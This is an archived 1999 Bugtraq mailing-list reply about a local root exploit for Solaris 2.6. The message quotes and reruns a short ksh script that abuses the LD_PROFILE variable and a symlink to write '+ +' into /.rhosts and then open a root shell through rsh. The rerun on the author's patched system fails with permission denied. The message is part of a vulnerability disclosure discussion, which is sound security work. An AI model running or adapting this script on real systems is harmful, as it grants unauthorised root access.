[11983] in bugtraq
Re: LD_PROFILE local root exploit for solaris 2.6
daemon@ATHENA.MIT.EDU (Brock Sides)
Thu Sep 23 20:18:01 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9909231641090.8553-100000@koala.towery.com>
Date: Thu, 23 Sep 1999 16:43:51 -0500
Reply-To: Brock Sides <bsides@TOWERY.COM>
From: Brock Sides <bsides@TOWERY.COM>
X-To: Steve Mynott <steve@TIGHTROPE.DEMON.CO.UK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19990922211439.A654@tightrope.demon.co.uk>
On Wed, 22 Sep 1999, Steve Mynott wrote:
> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> # LD_PROFILE local root exploit for solaris
> # steve@tightrope.demon.co.uk 19990922
> umask 000
> ln -s /.rhosts /var/tmp/ps.profile
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps
> echo + + > /.rhosts
> rsh -l root localhost csh -i
Not on my system:
[brock@agfa brock]$ uname -a
SunOS agfa 5.6 Generic_105181-16 sun4m sparc SUNW,SPARCstation-20
[brock@agfa brock]$ cat r00t.sh
#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# steve@tightrope.demon.co.uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
[brock@agfa brock]$ ./r00t.sh
PID TTY TIME CMD
22565 pts/5 0:00 r00t.sh
22484 pts/5 0:01 bash
./r00t.sh[8]: /.rhosts: cannot create
permission denied
[brock@agfa brock]$
--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides@towery.com
